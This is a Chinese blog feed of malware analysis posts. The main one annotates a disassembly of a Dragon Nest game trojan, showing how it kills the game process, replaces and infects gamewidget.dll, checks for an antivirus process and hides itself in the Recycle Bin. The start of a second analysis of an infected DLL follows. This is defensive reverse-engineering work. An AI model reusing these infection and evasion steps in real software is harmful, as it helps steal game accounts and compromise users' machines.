零度x's blog » 分析 http://www.lingdux.com Take it slowly,it's OK,it's OK. Wed, 09 Mar 2011 14:16:17 +0000 en hourly 1 http://wordpress.org/?v=3.3.1 一个龙之谷木马的分析 http://www.lingdux.com/2010/223.html http://www.lingdux.com/2010/223.html#comments Tue, 28 Sep 2010 06:36:10 +0000 零度x http://www.lingdux.com/?p=223 阅读全文——共26999字]]> 病毒样本:http://www.52pojie.cn/thread-64398-1-1.html

只分析了exe,感染的dll下次分析

exe

去除启动时候的小漏斗


004017C9  |.  53            push    ebx
004017CA  |.  55            push    ebp
004017CB  |.  56            push    esi
004017CC  |.  57            push    edi
004017CD  |.  FF15 AC104000 call    dword ptr [<&USER32.GetInputStat>; [GetInputState
004017D3  |.  33DB          xor     ebx, ebx
004017D5  |.  53            push    ebx                              ; /lParam => 0
004017D6  |.  53            push    ebx                              ; |wParam => 0
004017D7  |.  53            push    ebx                              ; |Message => WM_NULL
004017D8  |.  FF15 64104000 call    dword ptr [<&KERNEL32.GetCurrent>; |[GetCurrentThreadId
004017DE  |.  50            push    eax                              ; |ThreadId
004017DF  |.  FF15 B0104000 call    dword ptr [<&USER32.PostThreadMe>; \PostThreadMessageA
004017E5  |.  53            push    ebx                              ; /MsgFilterMax => 0
004017E6  |.  53            push    ebx                              ; |MsgFilterMin => 0
004017E7  |.  8D4424 1C     lea     eax, dword ptr [esp+1C]          ; |
004017EB  |.  53            push    ebx                              ; |hWnd => NULL
004017EC  |.  50            push    eax                              ; |pMsg
004017ED  |.  FF15 B4104000 call    dword ptr [<&USER32.GetMessageA>>; \GetMessageA

读取附加数据


004017F8  |.  68 1C284000   push    0040281C                         ; /Buffer = ctfmon.0040281C
004017FD  |.  56            push    esi                              ; |BufSize => 104 (260.)
004017FE  |.  FF15 60104000 call    dword ptr [<&KERNEL32.GetLogical>; \GetLogicalDriveStringsA
00401804  |.  6A 40         push    40                               ;  获取磁盘
00401806  |.  33C0          xor     eax, eax
00401808  |.  59            pop     ecx
00401809  |.  8D7C24 31     lea     edi, dword ptr [esp+31]
0040180D  |.  885C24 30     mov     byte ptr [esp+30], bl
00401811  |.  56            push    esi                              ; /BufSize => 104 (260.)
00401812  |.  F3:AB         rep     stos dword ptr es:[edi]          ; |
00401814  |.  66:AB         stos    word ptr es:[edi]                ; |
00401816  |.  AA            stos    byte ptr es:[edi]                ; |
00401817  |.  8D4424 34     lea     eax, dword ptr [esp+34]          ; |
0040181B  |.  895C24 14     mov     dword ptr [esp+14], ebx          ; |
0040181F  |.  50            push    eax                              ; |PathBuffer
00401820  |.  53            push    ebx                              ; |hModule => NULL
00401821  |.  FF15 48104000 call    dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA
00401827  |.  8B3D 5C104000 mov     edi, dword ptr [<&KERNEL32.SetFi>;  获取自身路径
0040182D  |.  8B2D 58104000 mov     ebp, dword ptr [<&KERNEL32.ReadF>;  kernel32.ReadFile
00401833  |>  53            /push    ebx                             ; /hTemplateFile
00401834  |.  53            |push    ebx                             ; |Attributes
00401835  |.  6A 03         |push    3                               ; |Mode = OPEN_EXISTING
00401837  |.  53            |push    ebx                             ; |pSecurity
00401838  |.  53            |push    ebx                             ; |ShareMode
00401839  |.  8D4424 44     |lea     eax, dword ptr [esp+44]         ; |
0040183D  |.  68 00000080   |push    80000000                        ; |Access = GENERIC_READ
00401842  |.  50            |push    eax                             ; |FileName
00401843  |.  FF15 28104000 |call    dword ptr [<&KERNEL32.CreateFil>; \CreateFileA
00401849  |.  8BF0          |mov     esi, eax                        ;  打开自身
0040184B  |.  3BF3          |cmp     esi, ebx
0040184D  |.  74 3B         |je      short 0040188A
0040184F  |.  6A 02         |push    2
00401851  |.  53            |push    ebx
00401852  |.  68 3CFEFFFF   |push    -1C4
00401857  |.  56            |push    esi
00401858  |.  FFD7          |call    edi                             ;  kernel32.SetFilePointer
0040185A  |.  8D4424 10     |lea     eax, dword ptr [esp+10]         ;  设置指针
0040185E  |.  53            |push    ebx
0040185F  |.  50            |push    eax
00401860  |.  68 C4010000   |push    1C4
00401865  |.  68 201A4000   |push    00401A20
0040186A  |.  56            |push    esi
0040186B  |.  FFD5          |call    ebp                             ;  kernel32.ReadFile
0040186D  |.  A1 E01B4000   |mov     eax, dword ptr [401BE0]         ;  读取附加数据
00401872  |.  3BC3          |cmp     eax, ebx
00401874  |.  77 23         |ja      short 00401899
00401876  |.  68 E8030000   |push    3E8                             ; /Timeout = 1000. ms
0040187B  |.  FF15 44104000 |call    dword ptr [<&KERNEL32.Sleep>]   ; \Sleep
00401881  |.  56            |push    esi                             ; /hObject
00401882  |.  FF15 20104000 |call    dword ptr [<&KERNEL32.CloseHand>; \CloseHandle
00401888  |.^ EB A9         \jmp     short 00401833                  ; 读取失败则返回
0040188A  |>  5F            pop     edi
0040188B  |.  5E            pop     esi
0040188C  |.  5D            pop     ebp
0040188D  |.  33C0          xor     eax, eax
0040188F  |.  5B            pop     ebx
00401890  |.  81C4 2C030000 add     esp, 32C
00401896  |.  C2 1000       retn    10
00401899  |> \50            push    eax
0040189A  |.  E8 69010000   call    <jmp.&MSVCRT.operator new>
0040189F  |.  A3 20294000   mov     dword ptr [402920], eax
004018A4  |.  B8 3CFEFFFF   mov     eax, -1C4
004018A9  |.  2B05 E01B4000 sub     eax, dword ptr [401BE0]
004018AF  |.  59            pop     ecx
004018B0  |.  6A 02         push    2
004018B2  |.  53            push    ebx
004018B3  |.  50            push    eax
004018B4  |.  56            push    esi
004018B5  |.  FFD7          call    edi                              ;  kernel32.SetFilePointer
004018B7  |.  8D4424 10     lea     eax, dword ptr [esp+10]          ;  设置文件指针
004018BB  |.  53            push    ebx
004018BC  |.  50            push    eax
004018BD  |.  FF35 E01B4000 push    dword ptr [401BE0]
004018C3  |.  FF35 20294000 push    dword ptr [402920]
004018C9  |.  56            push    esi
004018CA  |.  FFD5          call    ebp                              ;  kernel32.ReadFile
004018CC  |.  56            push    esi                              ; /读取附加数据
004018CD  |.  FF15 20104000 call    dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
004018D3  |.  E8 4CF9FFFF   call    00401224                         ;  释放句柄

查找龙之谷进程,找到则结束该进程


004011C0  /$  55            push    ebp                              ;  kernel32.ReadFile
004011C1  |.  8BEC          mov     ebp, esp
004011C3  |.  81EC 28010000 sub     esp, 128
004011C9  |.  56            push    esi
004011CA  |.  6A 00         push    0                                ; /ProcessID = 0
004011CC  |.  6A 02         push    2                                ; |Flags = TH32CS_SNAPPROCESS
004011CE  |.  E8 23080000   call    <jmp.&KERNEL32.CreateToolhelp32S>; \CreateToolhelp32Snapshot
004011D3  |.  8BF0          mov     esi, eax
004011D5  |.  8D85 D8FEFFFF lea     eax, dword ptr [ebp-128]
004011DB  |.  50            push    eax                              ; /lppe
004011DC  |.  56            push    esi                              ; |hSnapshot
004011DD  |.  C785 D8FEFFFF>mov     dword ptr [ebp-128], 128         ; |
004011E7  |.  E8 04080000   call    <jmp.&KERNEL32.Process32First>   ; \Process32First
004011EC  |.  85C0          test    eax, eax
004011EE  |.  74 2F         je      short 0040121F
004011F0  |>  8D85 D8FEFFFF /lea     eax, dword ptr [ebp-128]
004011F6  |.  50            |push    eax                             ; /lppe
004011F7  |.  56            |push    esi                             ; |hSnapshot
004011F8  |.  E8 ED070000   |call    <jmp.&KERNEL32.Process32Next>   ; \Process32Next
004011FD  |.  85C0          |test    eax, eax
004011FF  |.  74 1E         |je      short 0040121F
00401201  |.  8D85 FCFEFFFF |lea     eax, dword ptr [ebp-104]
00401207  |.  50            |push    eax                             ; /s2
00401208  |.  FF75 08       |push    dword ptr [ebp+8]               ; |s1
0040120B  |.  FF15 9C104000 |call    dword ptr [<&MSVCRT._stricmp>]  ; \_stricmp
00401211  |.  59            |pop     ecx        ; 查找龙之谷进程
00401212  |.  85C0          |test    eax, eax
00401214  |.  59            |pop     ecx
00401215  |.^ 75 D9         \jnz     short 004011F0
00401217  |.  8B85 E0FEFFFF mov     eax, dword ptr [ebp-120]
0040121D  |.  EB 02         jmp     short 00401221
0040121F  |>  33C0          xor     eax, eax
00401221  |>  5E            pop     esi
00401222  |.  C9            leave
00401223  \.  C3            retn

0040122F  |.  50            push    eax                              ; /ProcessId
00401230  |.  6A 00         push    0                                ; |Inheritable = FALSE
00401232  |.  6A 01         push    1                                ; |Access = TERMINATE
00401234  |.  FF15 10104000 call    dword ptr [<&KERNEL32.OpenProces>; \OpenProcess
0040123A  |.  6A 00         push    0                                ; /ExitCode = 0
0040123C  |.  50            push    eax                              ; |hProcess
0040123D  |.  FF15 3C104000 call    dword ptr [<&KERNEL32.TerminateP>; \TerminateProcess
00401243  \.  C3            retn         ; 存在则结束进程

游戏目录下原来的gamewidget.dll拷贝DragonNestRes.dll,然后感染gamewidget.dll并复制一份midimap.dll


004015C2  |.  50            push    eax                              ; /pHandle
004015C3  |.  33DB          xor     ebx, ebx                         ; |
004015C5  |.  68 19000200   push    20019                            ; |Access = KEY_READ
004015CA  |.  53            push    ebx                              ; |Reserved => 0
004015CB  |.  68 64114000   push    00401164                         ; |Subkey = "SOFTWARE\snda\dn"
004015D0  |.  68 02000080   push    80000002                         ; |hKey = HKEY_LOCAL_MACHINE
004015D5  |.  FF15 08104000 call    dword ptr [<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
004015DB  |.  85C0          test    eax, eax                         ;  读取HKEY_LOCAL_MACHINE\SOFTWARE\snda\dn
004015DD  |. /0F85 8C000000 jnz     0040166F        ; 读取不到则返回
004015E3  |. |6A 40         push    40
004015E5  |. |8DBD F1FEFFFF lea     edi, dword ptr [ebp-10F]
004015EB  |. |59            pop     ecx
004015EC  |. |889D F0FEFFFF mov     byte ptr [ebp-110], bl
004015F2  |. |F3:AB         rep     stos dword ptr es:[edi]
004015F4  |. |66:AB         stos    word ptr es:[edi]
004015F6  |. |AA            stos    byte ptr es:[edi]
004015F7  |. |8D45 F8       lea     eax, dword ptr [ebp-8]
004015FA  |. |C745 F4 01000>mov     dword ptr [ebp-C], 1
00401601  |. |50            push    eax                              ; /pBufSize
00401602  |. |8D85 F0FEFFFF lea     eax, dword ptr [ebp-110]         ; |
00401608  |. |50            push    eax                              ; |Buffer
00401609  |. |8D45 F4       lea     eax, dword ptr [ebp-C]           ; |
0040160C  |. |50            push    eax                              ; |pValueType
0040160D  |. |53            push    ebx                              ; |Reserved => NULL
0040160E  |. |68 58114000   push    00401158                         ; |ValueName = "MainProg"
00401613  |. |C745 F8 04010>mov     dword ptr [ebp-8], 104           ; |
0040161A  |. |FF75 FC       push    dword ptr [ebp-4]                ; |hKey
0040161D  |. |FF15 04104000 call    dword ptr [<&ADVAPI32.RegQueryVa>; \RegQueryValueExA
00401623  |. |85C0          test    eax, eax                         ;  读取路径
004013B3  |.  50            push    eax                              ; /FileName
004013B4  |.  FF15 30104000 call    dword ptr [<&KERNEL32.GetFileAtt>; \GetFileAttributesA
004013BA  |.  83F8 FF       cmp     eax, -1                          ;  获取文件的属性,用来判断DragonNestRes.dll是否存在
004013BD  |.  75 15         jnz     short 004013D4
004013BF  |.  8D85 F4FDFFFF lea     eax, dword ptr [ebp-20C]
004013C5  |.  53            push    ebx                              ; /FailIfExists
004013C6  |.  50            push    eax                              ; |NewFileName
004013C7  |.  8D85 F8FEFFFF lea     eax, dword ptr [ebp-108]         ; |
004013CD  |.  50            push    eax                              ; |ExistingFileName
004013CE  |.  FF15 2C104000 call    dword ptr [<&KERNEL32.CopyFileA>>; \CopyFileA
004013D4  |>  8D85 F8FEFFFF lea     eax, dword ptr [ebp-108]         ;  不存在则在游戏目录用原来的gamewidget.dll拷贝DragonNestRes.dll

00401299  /$  55            push    ebp
0040129A  |.  8BEC          mov     ebp, esp
0040129C  |.  81EC 08020000 sub     esp, 208
004012A2  |.  56            push    esi
004012A3  |.  8B75 08       mov     esi, dword ptr [ebp+8]
004012A6  |.  56            push    esi                              ; /FileName
004012A7  |.  FF15 1C104000 call    dword ptr [<&KERNEL32.DeleteFile>; \DeleteFileA
004012AD  |.  6A 00         push    0                                ; /删除gamewidget.dll
004012AF  |.  56            push    esi                              ; |path
004012B0  |.  FF15 A0104000 call    dword ptr [<&MSVCRT._access>]    ; \_access
004012B6  |.  59            pop     ecx                              ;  判断是否删除成功
00401401  |.  53            push    ebx                              ; /hTemplateFile
00401402  |.  53            push    ebx                              ; |Attributes
00401403  |.  6A 01         push    1                                ; |Mode = CREATE_NEW
00401405  |.  53            push    ebx                              ; |pSecurity
00401406  |.  53            push    ebx                              ; |ShareMode
00401407  |.  68 00000040   push    40000000                         ; |Access = GENERIC_WRITE
0040140C  |.  50            push    eax                              ; |FileName
0040140D  |.  FF15 28104000 call    dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
00401413  |.  8BF8          mov     edi, eax                         ;  创建新的gamewidget.dll
00401415  |.  3BFB          cmp     edi, ebx
00401417  |.  75 07         jnz     short 00401420
00401419  |.  33C0          xor     eax, eax
0040141B  |.  E9 A5000000   jmp     004014C5
00401420  |>  8D45 FC       lea     eax, dword ptr [ebp-4]
00401423  |.  53            push    ebx                              ; /pOverlapped
00401424  |.  50            push    eax                              ; |pBytesWritten
00401425  |.  8B35 24104000 mov     esi, dword ptr [<&KERNEL32.Write>; |kernel32.WriteFile
0040142B  |.  FF35 E01B4000 push    dword ptr [401BE0]               ; |nBytesToWrite = 2A00 (10752.)
00401431  |.  FF35 20294000 push    dword ptr [402920]               ; |Buffer = 003D4380
00401437  |.  57            push    edi                              ; |hFile
00401438  |.  FFD6          call    esi                              ; \WriteFile
0040143A  |.  C745 0C D0070>mov     dword ptr [ebp+C], 7D0           ;  写入DLL
00401441  |> /8D45 FC       /lea     eax, dword ptr [ebp-4]
00401444  |. |53            |push    ebx
00401445  |. |50            |push    eax
00401446  |. |FF35 E01B4000 |push    dword ptr [401BE0]
0040144C  |. |FF35 20294000 |push    dword ptr [402920]
00401452  |. |57            |push    edi
00401453  |. |FFD6          |call    esi
00401455  |. |FF4D 0C       |dec     dword ptr [ebp+C]
00401458  |.^\75 E7         \jnz     short 00401441                  ;  再重复写入2000次,曾大文件体积
0040145A  |.  8D45 FC       lea     eax, dword ptr [ebp-4]
0040145D  |.  53            push    ebx
0040145E  |.  50            push    eax
0040145F  |.  68 C4010000   push    1C4
00401464  |.  68 201A4000   push    00401A20
00401469  |.  57            push    edi
0040146A  |.  FFD6          call    esi                              ;  kernel32.WriteFile
0040146C  |.  57            push    edi                              ; /写入附加数据
0040146D  |.  FF15 20104000 call    dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle
00401473  |.  6A 40         push    40                               ;  释放句柄
004014AD  |.  8D85 F0FCFFFF lea     eax, dword ptr [ebp-310]
004014B3  |.  53            push    ebx                              ; /FailIfExists
004014B4  |.  50            push    eax                              ; |NewFileName
004014B5  |.  8D85 F8FEFFFF lea     eax, dword ptr [ebp-108]         ; |
004014BB  |.  50            push    eax                              ; |ExistingFileName = "C:\Program Files\?,A2,"",B4,"笸鏫龙之谷\gamewidget.dll"
004014BC  |.  FF15 2C104000 call    dword ptr [<&KERNEL32.CopyFileA>>; \CopyFileA
004014C2  |.  6A 01         push    1                                ;  已经替换的gamewidget.dll拷贝midimap.dll

再次感染


00401684  |.  50            push    eax                              ; /pHandle
00401685  |.  33DB          xor     ebx, ebx                         ; |
00401687  |.  68 19000200   push    20019                            ; |Access = KEY_READ
0040168C  |.  53            push    ebx                              ; |Reserved => 0
0040168D  |.  68 84114000   push    00401184                         ; |Subkey = "Software\Microsoft\Windows\ShellNoRoam\MUICache"
00401692  |.  68 01000080   push    80000001                         ; |hKey = HKEY_CURRENT_USER
00401697  |.  FF15 08104000 call    dword ptr [<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
0040169D  |.  85C0          test    eax, eax                         ;  打开HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache
0040169F  |. /0F85 17010000 jnz     004017BC
004016A5  |. |895D FC       mov     dword ptr [ebp-4], ebx
004016A8  |. |BE 04010000   mov     esi, 104
004016AD  |> |6A 40         /push    40
004016AF  |. |33C0          |xor     eax, eax
004016B1  |. |59            |pop     ecx
004016B2  |. |8DBD E5FEFFFF |lea     edi, dword ptr [ebp-11B]
004016B8  |. |889D E4FEFFFF |mov     byte ptr [ebp-11C], bl
004016BE  |. |6A 40         |push    40
004016C0  |. |F3:AB         |rep     stos dword ptr es:[edi]
004016C2  |. |66:AB         |stos    word ptr es:[edi]
004016C4  |. |AA            |stos    byte ptr es:[edi]
004016C5  |. |59            |pop     ecx
004016C6  |. |33C0          |xor     eax, eax
004016C8  |. |8DBD D9FBFFFF |lea     edi, dword ptr [ebp-427]
004016CE  |. |889D D8FBFFFF |mov     byte ptr [ebp-428], bl
004016D4  |. |F3:AB         |rep     stos dword ptr es:[edi]
004016D6  |. |8D4D EC       |lea     ecx, dword ptr [ebp-14]
004016D9  |. |8975 F0       |mov     dword ptr [ebp-10], esi
004016DC  |. |51            |push    ecx                             ; /pBufSize
004016DD  |. |8D8D D8FBFFFF |lea     ecx, dword ptr [ebp-428]        ; |
004016E3  |. |51            |push    ecx                             ; |Buffer
004016E4  |. |8D4D F8       |lea     ecx, dword ptr [ebp-8]          ; |
004016E7  |. |66:AB         |stos    word ptr es:[edi]               ; |
004016E9  |. |51            |push    ecx                             ; |pValueType
004016EA  |. |8D4D F0       |lea     ecx, dword ptr [ebp-10]         ; |
004016ED  |. |53            |push    ebx                             ; |Reserved
004016EE  |. |51            |push    ecx                             ; |pValueCount
004016EF  |. |AA            |stos    byte ptr es:[edi]               ; |
004016F0  |. |8B45 FC       |mov     eax, dword ptr [ebp-4]          ; |
004016F3  |. |FF45 FC       |inc     dword ptr [ebp-4]               ; |
004016F6  |. |8D8D E4FEFFFF |lea     ecx, dword ptr [ebp-11C]        ; |
004016FC  |. |C745 F8 01000>|mov     dword ptr [ebp-8], 1            ; |
00401703  |. |51            |push    ecx                             ; |Value
00401704  |. |50            |push    eax                             ; |Index
00401705  |. |FF75 F4       |push    dword ptr [ebp-C]               ; |hKey
00401708  |. |8975 EC       |mov     dword ptr [ebp-14], esi         ; |
0040170B  |. |FF15 00104000 |call    dword ptr [<&ADVAPI32.RegEnumVa>; \RegEnumValueA
00401711  |. |85C0          |test    eax, eax                        ;  读取键值
00401713  |. |0F85 A3000000 |jnz     004017BC
00401719  |. |6A 40         |push    40
0040171B  |. |8DBD DDFCFFFF |lea     edi, dword ptr [ebp-323]
00401721  |. |59            |pop     ecx
00401722  |. |889D DCFCFFFF |mov     byte ptr [ebp-324], bl
00401728  |. |F3:AB         |rep     stos dword ptr es:[edi]
0040172A  |. |66:AB         |stos    word ptr es:[edi]
0040172C  |. |AA            |stos    byte ptr es:[edi]
0040172D  |. |8D45 E8       |lea     eax, dword ptr [ebp-18]
00401730  |. |8975 E8       |mov     dword ptr [ebp-18], esi
00401733  |. |50            |push    eax                             ; /pBufSize
00401734  |. |8D85 DCFCFFFF |lea     eax, dword ptr [ebp-324]        ; |
0040173A  |. |50            |push    eax                             ; |Buffer
0040173B  |. |8D45 F8       |lea     eax, dword ptr [ebp-8]          ; |
0040173E  |. |50            |push    eax                             ; |pValueType
0040173F  |. |8D85 E4FEFFFF |lea     eax, dword ptr [ebp-11C]        ; |
00401745  |. |53            |push    ebx                             ; |Reserved
00401746  |. |50            |push    eax                             ; |ValueName
00401747  |. |FF75 F4       |push    dword ptr [ebp-C]               ; |hKey
0040174A  |. |FF15 04104000 |call    dword ptr [<&ADVAPI32.RegQueryV>; \RegQueryValueExA
00401750  |. |85C0          |test    eax, eax                        ;  读取LangID
00401752  |.^|0F85 55FFFFFF |jnz     004016AD
00401758  |. |8D85 DCFCFFFF |lea     eax, dword ptr [ebp-324]
0040175E  |. |68 78114000   |push    00401178                        ; /s2 = "dragonnest"
00401763  |. |50            |push    eax                             ; |s1 = "?,AC,"?,B6,"终",B6,"?
00401764  |. |FF15 8C104000 |call    dword ptr [<&MSVCRT.strstr>]    ; \strstr
0040176A  |. |59            |pop     ecx                             ;  查找值为dragonnest的项
0040176B  |. |85C0          |test    eax, eax
0040176D  |. |59            |pop     ecx
0040176E  |.^|0F84 39FFFFFF \je      004016AD

……再一次感染。。。

查找瑞星进程,没找到则把自身移动到回收站,随机文件名


004018E2  |.  BD B4114000   mov     ebp, 004011B4                    ;  ASCII "RavMonD.exe"
004018E7  |.  55            push    ebp
004018E8  |.  E8 D3F8FFFF   call    004011C0                         ;  查找RavMonD.exe,没找到则把自身移动到回收站,随机文件名

00401511  |.  68 04010000   push    104                              ; /BufSize = 104 (260.)
00401516  |.  50            push    eax                              ; |PathBuffer
00401517  |.  6A 00         push    0                                ; |hModule = NULL
00401519  |.  FF15 48104000 call    dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA
0040151F  |.  8B35 54104000 mov     esi, dword ptr [<&KERNEL32.GetTi>;  获取自身路径
00401525  |.  FFD6          call    esi                              ; [GetTickCount
00401527  |.  50            push    eax                              ; /获取启动时间
00401528  |.  8B3D A8104000 mov     edi, dword ptr [<&USER32.wsprint>; |USER32.wsprintfA
0040152E  |.  0FBE85 FCFEFF>movsx   eax, byte ptr [ebp-104]          ; |
00401535  |.  50            push    eax                              ; |<%c>
00401536  |.  8D85 F8FDFFFF lea     eax, dword ptr [ebp-208]         ; |
0040153C  |.  68 44114000   push    00401144                         ; |Format = "%c:\RECYCLER\%d.tmp"
00401541  |.  50            push    eax                              ; |s
00401542  |.  FFD7          call    edi                              ; \wsprintfA
00401544  |.  8B1D 1C104000 mov     ebx, dword ptr [<&KERNEL32.Delet>;  构造路径C:\RECYCLER\4143625.tmp
0040154A  |.  83C4 10       add     esp, 10
0040154D  |.  8D85 F8FDFFFF lea     eax, dword ptr [ebp-208]
00401553  |.  50            push    eax                              ; /FileName
00401554  |.  FFD3          call    ebx                              ; \DeleteFileA
00401556  |.  85C0          test    eax, eax                         ;  删除文件(如果已存在)
00401558  |.  75 30         jnz     short 0040158A
0040155A  |.  FF15 50104000 call    dword ptr [<&KERNEL32.GetLastErr>; [GetLastError
00401560  |.  83F8 03       cmp     eax, 3
00401563  |.  75 25         jnz     short 0040158A
00401565  |.  FFD6          call    esi
00401567  |.  50            push    eax                              ;  获取启动时间
00401568  |.  0FBE85 FCFEFF>movsx   eax, byte ptr [ebp-104]
0040156F  |.  50            push    eax
00401570  |.  8D85 F8FDFFFF lea     eax, dword ptr [ebp-208]
00401576  |.  68 30114000   push    00401130                         ;  ASCII "%c:\Recycled\%d.tmp"
0040157B  |.  50            push    eax
0040157C  |.  FFD7          call    edi                              ;  wsprintfA
0040157E  |.  83C4 10       add     esp, 10                          ;  构造C:\Recycled\4273328.tmp
00401581  |.  8D85 F8FDFFFF lea     eax, dword ptr [ebp-208]
00401587  |.  50            push    eax
00401588  |.  FFD3          call    ebx
0040158A  |>  8D85 F8FDFFFF lea     eax, dword ptr [ebp-208]         ;  删除文件(如果已存在)
00401590  |.  50            push    eax                              ; /NewName
00401591  |.  8D85 FCFEFFFF lea     eax, dword ptr [ebp-104]         ; |
00401597  |.  50            push    eax                              ; |ExistingName
00401598  |.  FF15 4C104000 call    dword ptr [<&KERNEL32.MoveFileA>>; \MoveFileA
0040159E  |.  6A 04         push    4                                ; /移动自身到C:\Recycled\4273328.tmp
004015A0  |.  8D85 F8FDFFFF lea     eax, dword ptr [ebp-208]         ; |
004015A6  |.  6A 00         push    0                                ; |NewName = NULL
004015A8  |.  50            push    eax                              ; |ExistingName
004015A9  |.  FF15 14104000 call    dword ptr [<&KERNEL32.MoveFileEx>; \MoveFileExA

感染安装龙之谷的所有磁盘

[sourcode]

004018F7  |>  6A 40         /push    40
004018F9  |. |33C0          |xor     eax, eax
004018FB  |. |59            |pop     ecx
004018FC  |. |8DBC24 350100>|lea     edi, dword ptr [esp+135]
00401903  |. |889C24 340100>|mov     byte ptr [esp+134], bl
0040190A  |. |BE 1C284000   |mov     esi, 0040281C                   ;  ASCII "A:\"
0040190F  |. |F3:AB         |rep     stos dword ptr es:[edi]
00401911  |. |66:AB         |stos    word ptr es:[edi]
00401913  |. |AA            |stos    byte ptr es:[edi]
00401914  |. |33FF          |xor     edi, edi
00401916  |. |381D 1C284000 |cmp     byte ptr [40281C], bl
0040191C  |. |0F84 84000000 |je      004019A6
00401922  |> |56            |/push    esi                            ; /RootPathName
00401923  |. |FF15 38104000 ||call    dword ptr [<&KERNEL32.GetDrive>; \GetDriveTypeA
00401929  |. |83F8 03       ||cmp     eax, 3                         ;  获取磁盘类型
0040192C  |. |75 63         ||jnz     short 00401991                 ;  判断是否为固定磁盘
0040192E  |. |8D8424 340100>||lea     eax, dword ptr [esp+134]       ;  是则执行
00401935  |. |50            ||push    eax
00401936  |. |68 C8104000   ||push    004010C8                       ;  ASCII "dnlauncher.exe"
0040193B  |. |56            ||push    esi
0040193C  |. |FF15 BC104000 ||call    dword ptr [<&dbghelp.SearchTre>;  dbghelp.SearchTreeForFile
00401942  |. |85C0          ||test    eax, eax                       ;  查找是否存在dnlauncher.exe
00401944  |. |74 4B         ||je      short 00401991
00401946  |. |6A 40         ||push    40
00401948  |. |33C0          ||xor     eax, eax
0040194A  |. |59            ||pop     ecx
0040194B  |. |8DBC24 390200>||lea     edi, dword ptr [esp+239]
00401952  |. |889C24 380200>||mov     byte ptr [esp+238], bl
00401959  |. |53            ||push    ebx
0040195A  |. |F3:AB         ||rep     stos dword ptr es:[edi]
0040195C  |. |66:AB         ||stos    word ptr es:[edi]
0040195E  |. |AA            ||stos    byte ptr es:[edi]
0040195F  |. |8D8424 3C0200>||lea     eax, dword ptr [esp+23C]
00401966  |. |50            ||push    eax
00401967  |. |8D8424 3C0100>||lea     eax, dword ptr [esp+13C]
0040196E  |. |50            ||push    eax
0040196F  |. |E8 D0F8FFFF   ||call    00401244                       ;  取dnlauncher.exe的路径
00401974  |. |E8 ABF8FFFF   ||call    00401224                       ;  结束进程
00401979  |. |8D8424 440200>||lea     eax, dword ptr [esp+244]
00401980  |. |68 E8104000   ||push    004010E8                       ;  ASCII "gamewidget.dll"
00401985  |. |50            ||push    eax
00401986  |. |E8 BAF9FFFF   ||call    00401345                       ;  再次感染
0040198B  |. |83C4 14       ||add     esp, 14
0040198E  |. |6A 01         ||push    1
00401990  |. |5F            ||pop     edi
00401991  |> |56            ||push    esi                            ; /String
00401992  |. |FF15 34104000 ||call    dword ptr [<&KERNEL32.lstrlenA>; \lstrlenA
00401998  |. |385C06 01     ||cmp     byte ptr [esi+eax+1], bl
0040199C  |. |8D7406 01     ||lea     esi, dword ptr [esi+eax+1]
004019A0  |.^|75 80         |\jnz     short 00401922
004019A2  |. |3BFB          |cmp     edi, ebx
004019A4  |. |75 10         |jnz     short 004019B6
004019A6  |> |68 20BF0200   |push    2BF20                           ; /Timeout = 180000. ms
004019AB  |. |FF15 44104000 |call    dword ptr [<&KERNEL32.Sleep>]   ; \Sleep
004019B1  |.^\E9 41FFFFFF   \jmp     004018F7
004019B6  |>  FF35 20294000 push    dword ptr [402920]
004019BC  |.  E8 4D000000   call    <jmp.&MSVCRT.operator delete>
004019C1  |.  55            push    ebp
004019C2  |.  E8 F9F7FFFF   call    004011C0
004019C7  |.  59            pop     ecx
004019C8  |.  85C0          test    eax, eax
004019CA  |.  59            pop     ecx
004019CB  |.  75 07         jnz     short 004019D4
004019CD  |.  E8 16FBFFFF   call    004014E8
004019D2  |.  EB 0E         jmp     short 004019E2
004019D4  |>  6A 04         push    4                                ; /Flags = DELAY_UNTIL_REBOOT
004019D6  |.  8D4424 34     lea     eax, dword ptr [esp+34]          ; |
004019DA  |.  53            push    ebx                              ; |NewName
004019DB  |.  50            push    eax                              ; |ExistingName
004019DC  |.  FF15 14104000 call    dword ptr [<&KERNEL32.MoveFileEx>; \MoveFileExA
004019E2  |>  53            push    ebx                              ; /自身移动到回收站
004019E3  |.  FF15 7C104000 call    dword ptr [<&MSVCRT.exit>]       ; \exit
004019E9  |.  CC            int3                                     ;  退出

[/sourcode]

]]> http://www.lingdux.com/2010/223.html/feed 3 极虎病毒样本分析2 http://www.lingdux.com/2010/216.html http://www.lingdux.com/2010/216.html#comments Fri, 18 Jun 2010 19:12:47 +0000 零度x http://www.lingdux.com/?p=216 阅读全文——共25054字]]> 继续上一次分析感染的dll

00871B9A  |.  6A 1C         push    1C                               ; /BufSize = 1C (28.)
00871B9C  |.  8D45 E4       lea     eax, dword ptr [ebp-1C]          ; |
00871B9F  |.  50            push    eax                              ; |Buffer
00871BA0  |.  FF75 E0       push    dword ptr [ebp-20]               ; |Address
00871BA3  |.  FF15 2C918700 call    dword ptr [<&KERNEL32.VirtualQue>; \VirtualQuery
00871BA9  |.  8B45 E8       mov     eax, dword ptr [ebp-18]          ;  VirTualQuery获取内存信息
00871BAC  |.  A3 38DC8700   mov     dword ptr [87DC38], eax
00871BB1  |.  6A 00         push    0                                ; /pModule = NULL
00871BB3  |.  FF15 04918700 call    dword ptr [<&KERNEL32.GetModuleH>; \GetModuleHandleA
00871BB9  |.  3B05 38DC8700 cmp     eax, dword ptr [87DC38]          ;   GetModuleHandle获取当前模块基址
00871BBF  |.  75 16         jnz     short 00871BD7                   ;  两者比较,相等执行loder部分功能,不相等则开始。。。 

008758E2  |.  6A 00         push    0                                ; /pThreadId = NULL
008758E4  |.  6A 00         push    0                                ; |CreationFlags = 0
008758E6  |.  6A 00         push    0                                ; |pThreadParm = NULL
008758E8  |.  68 9D538700   push    0087539D                         ; |ThreadFunction = appmgmts.0087539D
008758ED  |.  6A 00         push    0                                ; |StackSize = 0
008758EF  |.  6A 00         push    0                                ; |pSecurity = NULL
008758F1  |.  FF15 80918700 call    dword ptr [<&KERNEL32.CreateThre>; \CreateThread
